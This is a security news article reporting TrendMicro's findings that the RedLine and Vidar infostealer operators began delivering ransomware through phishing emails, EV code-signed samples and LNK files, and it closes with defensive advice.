In a concerning development, two cybercriminal groups known for spreading infostealers have expanded their operations to include ransomware attacks. These threat actors, responsible for the RedLine and Vidar stealer malwares, are now distributing ransomware payloads through phishing campaigns that utilize code-signing certificates. The use of these certificates allows the attackers to circumvent email security measures, making it easier for them to deliver their malicious payloads.
Researchers from TrendMicro recently uncovered this new tactic employed by the cybercriminal groups. They studied a specific case in which a victim initially received infostealer malware with Extended Validation (EV) code-signing certificates. However, the same victim later started receiving ransomware payloads through the same delivery channels. EV code-signing certificates are issued to organizations that have been verified to have legal and physical existence, requiring a more rigorous verification process compared to regular code-signing certificates.
According to the researchers, the threat actors behind these attacks are streamlining their operations and making their techniques multipurpose. The researchers discovered 30 EV code-signed samples used from July to August this year in relation to the specific victim. It is worth noting that each sample of the infostealer malware had a different hash, making it polymorphous and more challenging to detect.
This tactic represents the first observed instance of a single threat actor using so many EV code-signed samples. Although the researchers are unsure how the threat actor obtained the private key, it is not uncommon for attackers to abuse code-signing certificates by using stolen certificates to make malware appear legitimate.
In response to the security gaps exposed by this tactic, the Certificate Authority/Browser Forum (CABF) has made hardware key generation mandatory for regular code-signing certificates. This change aims to enhance private key protection and make it more difficult to steal keys and certificates from computers. By implementing hardware key generation, private keys and certificates cannot be copied as software data.
TrendMicro’s investigation into the recent incident revealed that the code signing of the infostealer was not invalidated because the revocation date was set to the date the abuse was reported, rather than the sample’s signing date. The researchers notified the certificate authority (CA) about this issue and recommended revoking the certificate using the issuance date as the revocation date instead. The CA then processed the certificate accordingly, invalidating all code signing using that certificate beyond the corrected revocation date.
The campaign investigated by TrendMicro began with socially engineered spear-phishing emails that urged the victim to take urgent action. These emails covered various topics such as health and hotel accommodations. The victim initially received infostealer payloads resulting from a series of campaigns. However, on August 9, the victim received a ransomware payload after being deceived into downloading and opening a fake TripAdvisor complaint email attachment disguised as a benign .pdf file. This file concealed a malicious .htm payload that initiated a series of processes leading to the deployment of ransomware.
Interestingly, while the initial infostealer payloads had EV certificates, the files used to drop the ransomware payload did not. Nevertheless, the payloads originated from the same threat actor and were delivered through the same method. The researchers noted that the threat actors used LNK files containing commands to execute the malicious files, thereby bypassing detection. They also found that malicious actors were able to transfer these files through Google Drive, evading the platform’s built-in protocols designed to guard against malware.
TrendMicro warns that individuals and organizations targeted by infostealing campaigns should be cautious of potential ransomware attacks in the future. The researchers emphasize the importance of configuring and updating attack surface protections to remove malicious items before they reach users. Early detection and mitigation can prevent threat actors from gathering enough information to carry out a ransomware attack. Additionally, users are advised to avoid downloading files, programs, and software from unverified sources and websites.
It is clear that cybercriminals are continuously evolving their tactics to maximize their impact and exploit vulnerabilities. Organizations and individuals must remain vigilant, regularly update their security measures, and exercise caution when interacting with emails and files from unknown sources. By staying informed and adopting proactive security measures, it is possible to mitigate the risks posed by these cyber threats.